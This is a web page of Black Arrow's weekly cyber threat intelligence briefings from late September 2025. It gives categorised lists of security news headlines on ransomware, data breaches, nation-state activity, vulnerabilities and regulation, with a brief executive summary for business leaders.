Salesforce faces class action after Salesloft breach • The Register

Harrods hit by second cyber attack in six months | Computer Weekly

1.5 Million Impacted by Allianz Life Data Breach - SecurityWeek

Latest Airline Security Breach Leaks Passports, IDs, Other Info

WestJet confirms cyberattack exposed IDs, passports in June incident

Renault and Dacia cyber attack: customer phone numbers and addresses stolen from third party | Auto Express

Data breach at dealership software provider impacts 766k clients

Hackers claim theft of Boeing supplier documents | Cybernews

Air Force admits SharePoint privacy issue; reports of breach • The Register

Sex offenders, terrorists, drug dealers, exposed in spyware breach | Malwarebytes

Organised Crime & Criminal Actors

UK convicts "Bitcoin Queen" in world’s largest cryptocurrency seizure

Inside Dark Web Exploit Markets in 2025: Pricing, Access & Active Sellers

UK Police Just Seized £5.5 Billion in Bitcoin — The World's Largest Crypto Bust

Why The US Just Put An $11M Dollar Bounty On This Ukranian Hacker

Interpol sting operation across Africa sees 260 arrested for sextortion and romance scams - BBC News

Beijing-backed burglars target government web servers • The Register

UK Government Wants to Keep $7 Billion in Stolen Bitcoin It Has Seized - Decrypt

The cybercrime arms race

China court sentences 11 people to death over alleged role in family-run Myanmar scam operations | China | The Guardian

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

£5.5B Bitcoin fraudster pleads guilty after years on the run • The Register

UK Police Just Seized £5.5 Billion in Bitcoin — The World's Largest Crypto Bust

UK Government Wants to Keep $7 Billion in Stolen Bitcoin It Has Seized - Decrypt

Insider Risk and Insider Threats

North Korea’s fake IT workers targeting healthcare, finance • The Register

Ransomware gang sought BBC reporter’s help in hacking media giant

'You'll never need to work again': Criminals offer reporter money to hack BBC - BBC News

Insurance

Ransomware remains the leading cause of costly cyber claims - Help Net Security

Cyber attacks: '80%' of ransomware victims pay up, insurer says | Money News | Sky News

Cyber insurance claims steady, but risk environment remains complex | Insurance Business America

More CVEs, But Cyber Insurers Aren't Altering Policies

Calls for mandatory reporting as 59% of SMEs hit by cyber attacks | Insurance Times

Zurich urges national cybersecurity metrics adoption | Insurance Business America

Supply Chain and Third Parties

The suspected weak link in the Jaguar Land Rover and M&S hacks

Jaguar Land Rover rescued with £1.5bn government-backed loan after crippling cyber attack | UK News | Sky News

Over three-quarters of West Midlands firms feel impact of JLR cyber-attack - The Stratford Observer

Tata Motors shares slip 1% as Moody’s downgrades outlook after JLR cyber incident - The Economic Times

Renault and Dacia cyber attack: customer phone numbers and addresses stolen from third party | Auto Express

Hackers claim theft of Boeing supplier documents | Cybernews

Software Supply Chain

Fake Postmark MCP npm package stole emails with one-liner • The Register

Cloud/SaaS

Fake Microsoft Teams installers push Oyster malware via malvertising

$50 Battering RAM Attack Breaks Intel and AMD Cloud Security Protections

Critical WD My Cloud bug allows remote command injection

Microsoft Reduces Israel's Access to Cloud and AI Products Over Reports of Mass Surveillance in Gaza - SecurityWeek

Air Force admits SharePoint privacy issue; reports of breach • The Register

Outages

Afghanistan hit by communications blackout after Taliban shuts internet | Afghanistan | The Guardian

Encryption

UK once again demands backdoor to Apple’s encrypted cloud storage - Ars Technica

Linux and Open Source

Linux Kernel ksmbd Vulnerability Allows Remote Attackers to Execute Arbitrary Code

The hidden risks inside open-source code - Help Net Security

Organizations Warned of Exploited Sudo Vulnerability - SecurityWeek

Passwords, Credential Stuffing & Brute Force Attacks

Losing your phone on a trip? Brutal. Not doing these 3 things first? Security nightmare | PCWorld

NIST’s new password rules | Cybernews

Social Media

Imgur blocks UK users after data watchdog signals possible fine

New Android Trojan "Datzbro" Tricking Elderly with AI-Generated Facebook Travel Events

UK minister suggests government could leave Elon Musk's X • The Register

Cyber criminals from Russia and Iran target MoD staff with fake LinkedIn job ads

Malvertising

Fake Microsoft Teams installers push Oyster malware via malvertising

This devious malware has jumped from Meta over to Google Ads and YouTube to spread - here's how to stay safe | TechRadar

Regulations, Fines and Legislation

Imgur blocks UK users after data watchdog signals possible fine

NIS2 and DORA explained: What Every Business Leader Needs to Know - Infosecurity Magazine

Brits warned as illegal robo-callers fined £550,000 • The Register

Shutdown Threat Puts Federal Cyber on Edge - InfoRiskToday

Cyber threat-sharing law set to lapse as govt shutdown looms • The Register

CISA kills agreement with nonprofit that runs MS-ISAC • The Register

UK once again demands backdoor to Apple’s encrypted cloud storage - Ars Technica

UK to roll out digital ID for right to work by 2029 • The Register

Six-month reporting obligation for cyberattacks on critical infrastructures

Department of War Launches New Cybersecurity Framework

Models, Frameworks and Standards

NIS2 and DORA explained: What Every Business Leader Needs to Know - Infosecurity Magazine

NIST’s new password rules | Cybernews

Careers, Working in Cyber and Information Security

Budgets, Staffing and Skills Fail to Keep Pace With Rising Cyber Threats, Finds New ISACA Research

Security risks leave 84 percent of IT pros feeling stressed at work - BetaNews

Why burnout is a growing problem in cybersecurity - BBC News

Two-Thirds of Organizations Have Unfilled Cybersecurity Positions - Infosecurity Magazine

Law Enforcement Action and Take Downs

UK convicts "Bitcoin Queen" in world’s largest cryptocurrency seizure

UK Police Just Seized £5.5 Billion in Bitcoin — The World's Largest Crypto Bust

Internet fraud in Africa: Interpol arrest over 200 cybercrime scammers across Africa for Operation Contender 3.0 - BBC News Pidgin

Interpol sting operation across Africa sees 260 arrested for sextortion and romance scams - BBC News

UK Government Wants to Keep $7 Billion in Stolen Bitcoin It Has Seized - Decrypt

Why The US Just Put An $11M Dollar Bounty On This Ukranian Hacker

Dutch teens arrested for trying to spy on Europol for Russia

China court sentences 11 people to death over alleged role in family-run Myanmar scam operations | China | The Guardian

Misinformation, Disinformation and Propaganda

Despite Russian Influence, Moldova Votes Pro-EU, Highlighting Future Election Risks

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Britain may already be at war with Russia, former head of MI5 says | Defence policy | The Guardian

Germany “not at war, but no longer at peace”: Merz - Euromaidan Press

Investigation finds Russian surveillance, sabotage ship near European undersea cables, FT reports

Macron warns of 'secret army' of Russian bots destroying Western democracies from within | УНН

NATO’s Article 4 Alert: The Path to Disentanglement - The National Interest

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Danish PM calls for strong answer from EU leaders to Russia's hybrid attacks - BBC News

Nation State Actors

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Submarine cable security is all at sea • The Register

Development of Cyber Forces in NATO Countries [Tytuł alternatywny: From Tallinn to DC: NATO’s Cyber Frontline]

Met warns that hostile states are recruiting youths for crime - BBC News

China

New China APT Strikes With Precision and Persistence

The China Threat to UK Firms | SC Media UK

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Russia, Chinese Hacking Buffets Europe - GovInfoSecurity

Chinese hackers exploiting VMware zero-day since October 2024

German infrastructure hit by drones, cybercrime, arson – DW – 09/30/2025

China-linked APT Phantom Taurus uses Net-Star malware in espionage campaigns against key sectors

Cybersecurity Experts Say These Humanoid Robots Secretly Send Data to China and Let Hackers Take Over Your Network

China court sentences 11 people to death over alleged role in family-run Myanmar scam operations | China | The Guardian

Beijing-backed burglars target government web servers • The Register

Judge rules that drone maker DJI is affiliated with China’s defense industry — company to stay on Pentagon’s list of Chinese military companies | Tom's Hardware

Russia

Britain may already be at war with Russia, former head of MI5 says | Defence policy | The Guardian

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Russia, Chinese Hacking Buffets Europe - GovInfoSecurity

Investigation finds Russian surveillance, sabotage ship near European undersea cables, FT reports

The Russian spy ship stalking Europe’s subsea cables

Macron warns of 'secret army' of Russian bots destroying Western democracies from within | УНН

NATO’s Article 4 Alert: The Path to Disentanglement - The National Interest

Ukraine war briefing: Europe ‘no longer at peace’ with Russia, says German chancellor | Ukraine | The Guardian

German infrastructure hit by drones, cybercrime, arson – DW – 09/30/2025

Danish PM calls for strong answer from EU leaders to Russia's hybrid attacks - BBC News

Cyber criminals from Russia and Iran target MoD staff with fake LinkedIn job ads

Dutch teens arrested for trying to spy on Europol for Russia

Despite Russian Influence, Moldova Votes Pro-EU, Highlighting Future Election Risks

New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks

Ukraine Warns of CABINETRAT Backdoor + XLL Add-ins Spread via Signal ZIPs

Ukrainian Cops Spoofed in Fileless Phishing on Kyiv

Iran

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Cyber criminals from Russia and Iran target MoD staff with fake LinkedIn job ads

Met warns that hostile states are recruiting youths for crime - BBC News

North Korea

North Korea’s fake IT workers targeting healthcare, finance • The Register

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Tools and Controls

How attackers poison AI tools and defenses - Help Net Security

Budgets, Staffing and Skills Fail to Keep Pace With Rising Cyber Threats, Finds New ISACA Research

Ransomware remains the leading cause of costly cyber claims - Help Net Security

Cyber attacks: '80%' of ransomware victims pay up, insurer says | Money News | Sky News

CIISec Members Say Budgets Are Falling Behind Threats - Infosecurity Magazine

Apple strengthens storage flexibility with new disk image formats - Help Net Security

Datacenter fire downs 647 South Korean government services • The Register

NIST’s new password rules | Cybernews

The hidden cyber risks of deploying generative AI

Cybersecurity professionals under pressure turn to AI amid rising threats | Fortune

What to know about 5G security threats in the enterprise | TechTarget

Microsoft Edge will soon protect against risky sideloaded extensions | PCWorld

Agentic AI in IT security: Where expectations meet reality | CSO Online

AI Tops Cybersecurity Investment Priorities, PwC Finds - Infosecurity Magazine

Microsoft Outlook stops displaying inline SVG images used in attacks

Pentagon relaxes military cybersecurity training • The Register

Cyber risk quantification helps CISOs secure executive support - Help Net Security

Other News

SMEs to step up cyber defences as over half experience cyber attack in past year - Insurance Age

2025 Cybersecurity Reality Check: Breaches Hidden, Attack Surfaces Growing, and AI Misperceptions Rising

Calls for mandatory reporting as 59% of SMEs hit by cyber attacks | Insurance Times

Datacenter fire downs 647 South Korean government services • The Register

90 percent of organizations face attacks involving lateral movement - BetaNews

UK at risk of 'cyber 9/11' wiping out internet for days

Many Attacks Aimed at EU Targeted OT, Says Cybersecurity Agency - SecurityWeek

Securing the Journey: Cybersecurity Challenges in the Tourism Industry - Security Boulevard

A breach every month raises doubts about South Korea's digital defenses | TechCrunch

Why Airlines & Airports Must Do More To Defend Against Cyberattacks

Pentagon relaxes military cybersecurity training • The Register

Humanoid Robots are Walking Trojan Horses — And They're Already in the Workplace - Security Boulevard

Vulnerability Management

CISOs advised to rethink vulnerability management as exploits sharply rise | CSO Online

More CVEs, But Cyber Insurers Aren't Altering Policies

UK and US urge Cisco users to ditch end-of-life security appliances | Computer Weekly

"Almost all" businesses being weighed down by Microsoft technical debt ahead of Windows 10 End Of Life | TechRadar

The hidden risks inside open-source code - Help Net Security

Vulnerabilities

Gone in 60 Minutes: Akira Defeats MFA for SonicWall SSL VPNs

Nearly 50,000 Cisco firewalls vulnerable to actively exploited flaws

High-Severity Vulnerabilities Patched in VMware Aria Operations, NSX, vCenter - SecurityWeek

UK and US urge Cisco users to ditch end-of-life security appliances | Computer Weekly

Chinese hackers exploiting VMware zero-day since October 2024

Linux Kernel ksmbd Vulnerability Allows Remote Attackers to Execute Arbitrary Code

Apple Updates iOS and macOS to Prevent Malicious Font Attacks - SecurityWeek

Google Gemini Vulnerabilities Let Attackers Exfiltrate User’s Saved Data and Location

Hackers Actively Scanning to Exploit Palo Alto Networks PAN-OS Global Protect Vulnerability

OpenSSL Vulnerabilities Let Attackers Execute Malicious Code and Recover Private Key Remotely

Adobe Analytics bug leaked customer tracking data to other tenants

'Delightful' Red Hat OpenShift AI bug allows full takeover • The Register

Broadcom Fails to Disclose Zero-Day Exploitation of VMware Vulnerability - SecurityWeek

Chrome 141 and Firefox 143 Patches Fix High-Severity Vulnerabilities - SecurityWeek

CISA warns of critical Linux Sudo flaw exploited in attacks

New bug in classic Outlook can only be fixed via Microsoft support

WD patches NAS security flaw which could have allowed full takeover | TechRadar

Hackers exploit Fortra GoAnywhere flaw before public alert

Notepad++ DLL Hijacking Vulnerability Let Attackers Execute Malicious Code

DrayTek warns of remote code execution bug in Vigor routers

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 28/09/2025 Black Arrow Admin 28/09/2025

Black Arrow Cyber Threat Intelligence Briefing 26 September 2025

Black Arrow Cyber Threat Intelligence Briefing 26 September 2025:

-Finance Professionals Rank Cyber as The Top Risk for 2026

-UK Co-operative Group Counts a £200m Sales Hit from Its April Cyber Incident

-Tata Motors Shares Drop 5% after JLR Cyber Attack

-Airport Outages Expose Fragile Links in Aviation Supply Chains

-Attackers Focus on MFA Bypass and Supply Chain Routes

-Insurer Reclaiming Costs from Technology Providers

-Ransomware Crews Multiply and Focus on Data Theft

-Phishing Surges as The Top Doorway for Ransomware In 2025

-Phishing Campaigns Spread Beyond Email as Criminals Exploit New Channels

-Generative AI Attacks Accelerate with Deepfakes and Malicious Prompts

-Stolen Credentials Fuel a Thriving Cybercrime Marketplace

-China Linked Attackers Embedded in Many Enterprises

-Law Firms Face Mounting Raids on Sensitive Client Files

Executive Summary

Cyber risk continues to dominate the business agenda, with incidents showing the scale of disruption and loss. A recurring insight this week is that attackers often remain undetected for long periods, exploiting MFA weaknesses and third-party flaws; supply chain risks are also prominent. The threat landscape is evolving: phishing is spreading beyond email, stolen credentials fuel cybercrime, and generative AI introduces deepfakes and malicious prompts.

To address these challenges, business leaders need an objective view of their risks and should establish their cyber strategy across people, operations and technology. Independent testing of response plans and governance over suppliers and AI systems are essential; cyber resilience must be led from the top, not delegated to IT.

Governance, Risk and Compliance

Cyber security biggest risk as businesses reel from major attacks | ICAEW

The culture of silence on data breaches has gone too far - Tech Monitor

Cyber attacks cost Europe €300bn in five years, warns Howden | Global Reinsurance

Enterprise Security and Digital Transformation in 2025 Navigating Risks and Opportunities - Security Boulevard

Cyber attacks cost European businesses over €300bn as insurance uptake lags

Cyber Threats Remain a Top Business Concern in Travelers Risk Index

CIO Watercooler Talk: C-Suite Advisors Amid Disruption

What Is Regulatory Compliance? | Definition From TechTarget

48% of Cybersecurity Bosses Failed to Report a Breach This Year

Gartner: Preemptive cybersecurity to dominate 50% of security spend by 2030 - Help Net Security

Third-party cyber risks among most significant threats to operational resilience: Acrisure - Reinsurance News

Sky News Daily podcast asks if Britain's suffering a cyber attack 'epidemic' and who could be targeted next | News UK Video News | Sky News

Hackers target supply chains’ weak links in growing threat to companies

Why IT/Security alignment is the key to efficient operations – Computerworld

Perspective: Why Politics in the Workplace is a Cybersecurity Risk - SecurityWeek

Threats

Ransomware, Extortion and Destructive Attacks

Phishing is now the main entry point for ransomware - BetaNews

How One Bad Password Ended a 158-Year-Old Business

Insurer Says Tech Services Firms Should Pay for Insured’s Ransomware Damages

Known. Emerging. Unstoppable? Ransomware Attacks Still Evade Defenses

Organizations Must Update Defenses to Scattered Spider Tactics, Expert - Infosecurity Magazine

Ransomware groups are multiplying, raising the stakes for defenders - Help Net Security

WarLock ransomware group attack surge | Cybernews

BlackLock Ransomware Attacking Windows, Linux, and VMware ESXi Environments

Scattered Spider Targets Financial Sector After Alleged Retirement | Security Magazine

UK chancellor blames cyberattacks on Russia despite evidence • The Register

GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware

Suspect arrested in cyberattack on Collins Aerospace check-in software | SC Media

Scattered Spider Member Surrenders Amid Shutdown Claims

Teen arrested in UK was a core figure in Scattered Spider’s operations | CyberScoop

Ransomware Payments vs Rising Incident Counts in 2025 - What’s Changing in RaaS Economics

Another alleged Scattered Spider member arrested • The Register

$115 million ransomware hacker arrested over extortion attacks — Scattered Spider alumnus allegedly involved in over 120 computer network intrusions targeting 47 U.S. entities | Tom's Hardware

Vegas cops book teen allegedly involved in casino hacks • The Register

Alleged Scattered Spider member turns self in to Las Vegas police | The Record from Recorded Future News

Obscura, an obscure new ransomware variant

INC ransomware: what you need to know | Fortra

Will banning ransom payments help protect UK businesses? - Raconteur

U.K. to introduce mandatory ransomware reporting, raising risk of ‘box-ticking’ compliance | Article | Compliance Week

Ransomware Victims

Insurer Says Tech Services Firms Should Pay for Insured’s Ransomware Damages

Jaguar Land Rover to bear full cost of cyber attack due to lack of insurance cover

How One Bad Password Ended a 158-Year-Old Business

Co-op suffers £200m revenue hit as it counts cost of April's cyber attack

Which UK retailers have been hit by cyber attacks in 2025? - Raconteur

All the major cyber attacks in the UK this year: Are they on the rise and what can be done? | The Standard

A cyberattack on Collins Aerospace disrupted operations at major European airports

Collins Aerospace ‘cyber attack’ latest in series of incidents at UK airports | The Standard

Airlines seen as vulnerable as ransomware confirmed in weekend cyberattack

Airport operations recovering following ransomware attack on Collins checking in software - Aviation Business News

Jaguar Land Rover Says Shutdown Will Continue Until at Least Oct 1 After Cyberattack - SecurityWeek

Tata Motors slides after reports of extended JLR shutdowns due to cyberattack | Capital Market News - Business Standard

Jaguar suppliers 'facing collapse': Ministers urged to act as car giant extends shutdowns into next month following devastating cyber attack | This is Money

Cyber Attack On JLR Should Be A ‘Wake-Up Call’ For British Industry - Minister - PM Today

Jaguar Land Rover restarts some IT systems as suppliers call for urgent support | Jaguar Land Rover | The Guardian

‘Like a bomb threat’ – Co-op looks forward as it grapples with cyber attack fallout | Retail Week

Volvo Group Employee Data Stolen in Ransomware Attack - SecurityWeek

Hackers claim to have stolen pictures, names and addresses of children in nursery firm cyber attack | UK News | Sky News

Scattered Spider Targets Financial Sector After Alleged Retirement | Security Magazine

Was the chancellor right to accuse Russia of being behind recent UK cyber attacks? | ITV News

Phishing & Email Based Attacks

Phishing is now the main entry point for ransomware - BetaNews

Hackers are now using deepfakes in phishing scams to fool banking apps and steal your money - how to stay safe | Tom's Guide

17,500 Phishing Domains Target 316 Brands Across 74 Countries in Global PhaaS Surge

Why attackers are moving beyond email-based phishing attacks

How to Spot and Stop Phishing Attacks Before They Happen - DevX

Microsoft spots LLM-obfuscated phishing attack - Help Net Security

AI vs. AI: Detecting an AI-obfuscated phishing campaign | Microsoft Security Blog

Threat Actors Attacking ICS Computers With Malicious Scripts and Phishing Pages

Phishing Campaign Evolves into PureRAT Deployment - Infosecurity Magazine

Other Social Engineering

What to do if your company discovers a North Korean worker in its ranks | CyberScoop

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware in Crypto Job Scams

How hiring fraud has become a cybersecurity threat vector | Biometric Update

Criminals are driving fake cell towers through cities to blast out scam texts | TechSpot

US employees 'unprepared' for cybersecurity threats - New Study

North Korean IT workers use fake profiles to steal crypto - Help Net Security

Threat Actor’s Using Copyright Takedown Claims to Deploy Malware

Lazarus RAT code resurfaces in North Korean IT-worker scams • The Register

Fraud, Scams and Financial Crime

Criminals are driving fake cell towers through cities to blast out scam texts | TechSpot

FBI Warns of Spoofed IC3 Website - SecurityWeek

Scammers are now faking the FBI's own website - here's how to stay safe | ZDNET

Google just took down 224 malicious apps with 38 million installs in massive SlopAds fraud campaign — how to stay safe | Tom's Guide

Eurojust Arrests 5 in €100M Cryptocurrency Investment Fraud Spanning 23 Countries

Artificial Intelligence

Hackers are now using deepfakes in phishing scams to fool banking apps and steal your money - how to stay safe | Tom's Guide

ChatGPT 'ShadowLeak' Allows Hackers to Steal Emails

Deepfake Attacks Hit Two-Thirds of Businesses - Infosecurity Magazine

Microsoft spots LLM-obfuscated phishing attack - Help Net Security

Hackers are using GPT-4 to build a virtual assistant - here's what we know | TechRadar

‘Harvest Now, Decrypt Later’ Attacks in the Post-Quantum, AI Era - EE Times Europe

AI-Powered App Exposes User Data, Creates Risk of Supply Chain Attacks | Trend Micro (US)

Critical Security Flaws Grow with AI Use, New Report Shows - Infosecurity Magazine

GenAI is exposing sensitive data at scale - Help Net Security

AI is rewriting the rules of cyber defense - Help Net Security

Generative AI attacks are accelerating at an alarming rate | IT Pro

AI needs ethics to avoid real-world harm - Help Net Security

Kaspersky: RevengeHotels returns with AI-coded malware • The Register

Why AI systems may never be secure, and what to do about it

Google's latest AI safety report explores AI beyond human control | ZDNET

2FA/MFA

Threat actors turning to MFA bypass, USB malware and supply chain attacks | SC Media

Malware

Threat actors turning to MFA bypass, USB malware and supply chain attacks | SC Media

Small business security warning - new malware is spoofing tools such as ChatGPT, Microsoft Office and Google Drive, so be on your guard | TechRadar

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware in Crypto Job Scams

Threat Actor’s Using Copyright Takedown Claims to Deploy Malware

Beware: GitHub repos distributing Atomic Infostealer on macOS

SystemBC Powers REM Proxy With 1,500 Daily VPS Victims Across 80 C2 Servers

LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer

Nimbus Manticore Deploys New Malware Targeting Europe - Check Point Research

Iran-Linked Hackers Target Europe With New Malware

Hacker Deploys 'OVERSTEP' Backdoor in SonicWall Attack

Google: Brickstorm malware used to steal U.S. orgs' data for over a year

BRICKSTORM malware is new Chinese espionage threat | Cybernews

Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs

Lazarus RAT code resurfaces in North Korean IT-worker scams • The Register

RedNovember Hackers Attacking Government and Technology Organizations to Deploy Backdoor - Cyber Security News

New EDR-Freeze tool uses Windows WER to suspend security software

Artifical Intellegence Trained to Attack Hotel Guests

Kaspersky: RevengeHotels returns with AI-coded malware • The Register

Threat Actors Attacking ICS Computers With Malicious Scripts and Phishing Pages

North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers

Phishing Campaign Evolves into PureRAT Deployment - Infosecurity Magazine

Bots/Botnets

SystemBC Powers REM Proxy With 1,500 Daily VPS Victims Across 80 C2 Servers

Double the Power: New DDoS From 'Aisuru' Botnet Easily Shatters Record

Cloudflare mitigates largest-ever DDoS attack at 22.2 Tbps

New Botnet Leverages DNS Misconfiguration to Launch Massive Cyber Attack

ShadowV2 Botnet Exploits Misconfigured AWS Docker Containers for DDoS-for-Hire Service

Mobile

Criminals are driving fake cell towers through cities to blast out scam texts | TechSpot

Google just took down 224 malicious apps with 38 million installs in massive SlopAds fraud campaign — how to stay safe | Tom's Guide

Numerous Applications Using Google's Firebase Platform Leaking Highly Sensitive Data - Cyber Security News

Unpatched flaw in OnePlus phones lets rogue apps text messages

Denial of Service/DoS/DDoS

Double the Power: New DDoS From 'Aisuru' Botnet Easily Shatters Record

Cloudflare mitigates largest-ever DDoS attack at 22.2 Tbps

ShadowV2 Botnet Exploits Misconfigured AWS Docker Containers for DDoS-for-Hire Service

Tech Overtakes Gaming as Top DDoS Attack Target, New Gcore Radar Report Finds

Predicting DDoS attacks: How deep learning could give defenders an early warning - Help Net Security

Internet of Things – IoT

EV charging biz zaps customers with data leak scare • The Register

Hackers Exploiting Hikvision Camera Vulnerability to Access Sensitive Information

Data Breaches/Leaks

ChatGPT 'ShadowLeak' Allows Hackers to Steal Emails

‘Harvest Now, Decrypt Later’ Attacks in the Post-Quantum, AI Era - EE Times Europe

Car Giant Stellantis Confims Third-Party Breach - Infosecurity Magazine

The culture of silence on data breaches has gone too far - Tech Monitor

Vastaamo psychotherapy hack: US citizen charged in latest twist of notorious data breach

Stellantis Data Breach Affects Millions of Car Buyers: Report | Entrepreneur

Cybercriminals are going after law firms' sensitive client data - Help Net Security

EV charging biz zaps customers with data leak scare • The Register

Numerous Applications Using Google's Firebase Platform Leaking Highly Sensitive Data - Cyber Security News

Volvo Group Employee Data Stolen in Ransomware Attack - SecurityWeek

‘Our worst day’: The untold story of the Electoral Commission cyber attack | Computer Weekly

Children's names, pictures and addresses stolen in nursery hack - BBC News

Boyd Gaming discloses data breach after suffering a cyberattack

Organised Crime & Criminal Actors

UK chancellor blames cyberattacks on Russia despite evidence • The Register

Scattered Spider Member Surrenders Amid Shutdown Claims

Teen arrested in UK was a core figure in Scattered Spider’s operations | CyberScoop

Attacker Breakout Time Falls to 18 Minutes - Infosecurity Magazine

Inside the economy built on stolen credentials - Help Net Security

Eurojust Arrests 5 in €100M Cryptocurrency Investment Fraud Spanning 23 Countries

Canada dismantles TradeOgre exchange, seizes $40 million in crypto

$439 million recovered in global financial crime crackdown - Help Net Security

€100M crypto scam busted: Five arrested in Europe-wide operation - Help Net Security

‘I Was a Weird Kid’: Jailhouse Confessions of a Teen Hacker – DataBreaches.Net

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

€100M crypto scam busted: Five arrested in Europe-wide operation - Help Net Security

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware in Crypto Job Scams

North Korean IT workers use fake profiles to steal crypto - Help Net Security

Canada dismantles TradeOgre exchange, seizes $40 million in crypto

North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers

Malware 'Game' On Steam Stole $32K From Cancer-Stricken Streamer

Insider Risk and Insider Threats

What to do if your company discovers a North Korean worker in its ranks | CyberScoop

How hiring fraud has become a cybersecurity threat vector | Biometric Update

US employees 'unprepared' for cybersecurity threats - New Study

Lazarus RAT code resurfaces in North Korean IT-worker scams • The Register

Insurance

Cyber attacks cost Europe €300bn in five years, warns Howden | Global Reinsurance

Cyber reinsurers reconsider appetite as market softens :: Insurance Day

When calling for help isn't a claim: A new era for small biz cyber support | Insurance Business America

Supply Chain and Third Parties

Threat actors turning to MFA bypass, USB malware and supply chain attacks | SC Media

Experts Warn of Global Breach Risk from Indian Suppliers - Infosecurity Magazine

Stellantis Data Breach Affects Millions of Car Buyers: Report | Entrepreneur

UNC5221 Uses BRICKSTORM Backdoor to Infiltrate U.S. Legal and Technology Sectors

Airport operations recovering following ransomware attack on Collins checking in software - Aviation Business News

Airport Chaos Shows Human Impact of 3rd-Party Attacks

Jaguar Land Rover Extends Production Pause Again - Infosecurity Magazine

Companies must be better prepared for cyber attacks after Jaguar hack exposes weaknesses | This is Money

Airport cyberattacks: Calls for stronger supply chain security and business resilience - Digital Journal

Airport cyber attacks highlight growing supply chain risk :: Insurance Day

Airport Chaos Shows Human Impact of 3rd-Party Attacks

JLR refuses to comment on reports it was uninsured against cyber attack that has forced shutdown | ITV News Central

Survey assesses impact of JLR cyber attack on supply chain - BBC News

Third-party cyber risks among most significant threats to operational resilience: Acrisure - Reinsurance News

Hackers target supply chains’ weak links in growing threat to companies

Tata-owned Jaguar Land Rover pushes to pay struggling suppliers after hack - The Economic Times

Software Supply Chain

5 ways to spot software supply chain attacks and stop worms - before it's too late | ZDNET

CISA urges orgs to review software after ‘Shai-Hulud’ supply chain compromise | The Record from Recorded Future News

Encryption

‘Harvest Now, Decrypt Later’ Attacks in the Post-Quantum, AI Era - EE Times Europe

Linux and Open Source

BlackLock Ransomware Attacking Windows, Linux, and VMware ESXi Environments

Passwords, Credential Stuffing & Brute Force Attacks

How One Bad Password Ended a 158-Year-Old Business

Inside the economy built on stolen credentials - Help Net Security

The Credential Cracking Crisis: Why Role-Based Training Is No Longer Optional | MSSP Alert

Social Media

Trump says Michael Dell is part of the team buying TikTok • The Register

Regulations, Fines and Legislation

What Is Regulatory Compliance? | Definition From TechTarget

Will banning ransom payments help protect UK businesses? - Raconteur

U.K. to introduce mandatory ransomware reporting, raising risk of ‘box-ticking’ compliance | Article | Compliance Week

Cyber threat information law hurtles toward expiration, with poor prospects for renewal | CyberScoop

Banks Brace for Cyber Fight as CISA Faces Expiration

FBI Pushes Back Against Scrutiny Over Cyber Cuts, Vacancies

NIS2 in the Baltics: How Lithuania, Latvia, and Estonia Differ

DoD issues replacement for risk management framework - Breaking Defense

Models, Frameworks and Standards

Has the UK’s Cyber Essentials scheme failed? - Tech Monitor

DoD issues replacement for risk management framework - Breaking Defense

NIS2 in the Baltics: How Lithuania, Latvia, and Estonia Differ

Careers, Working in Cyber and Information Security

Cyber Team Burnout Rivals Healthcare, Expert Says

AI is altering entry-level cyber hiring — and the nature of the skills gap | CSO Online

FBI to CISO: Unconventional Paths to Cyber Success

Law Enforcement Action and Take Downs

Teen arrested in UK was a core figure in Scattered Spider’s operations | CyberScoop

Was the chancellor right to accuse Russia of being behind recent UK cyber attacks? | ITV News

UK chancellor blames cyberattacks on Russia despite evidence • The Register

Scattered Spider Member Surrenders Amid Shutdown Claims

Vastaamo psychotherapy hack: US citizen charged in latest twist of notorious data breach

Suspect arrested in cyberattack on Collins Aerospace check-in software | SC Media

A Massive Telecom Threat Was Stopped Right As World Leaders Gathered at UN Headquarters in New York - SecurityWeek

€100M crypto scam busted: Five arrested in Europe-wide operation - Help Net Security

Canada dismantles TradeOgre exchange, seizes $40 million in crypto

Eurojust Arrests 5 in €100M Cryptocurrency Investment Fraud Spanning 23 Countries

$439 million recovered in global financial crime crackdown - Help Net Security

Judge orders release of teen accused in 2023 casino cyberattacks – DataBreaches.Net

Another alleged Scattered Spider member arrested • The Register

$115 million ransomware hacker arrested over extortion attacks — Scattered Spider alumnus allegedly involved in over 120 computer network intrusions targeting 47 U.S. entities | Tom's Hardware

Las Vegas police arrest minor accused of high-profile 2023 casino attacks | CyberScoop

Alleged Scattered Spider member turns self in to Las Vegas police | The Record from Recorded Future News

Misinformation, Disinformation and Propaganda

Russia Targets Moldovan Election in Disinformation Play

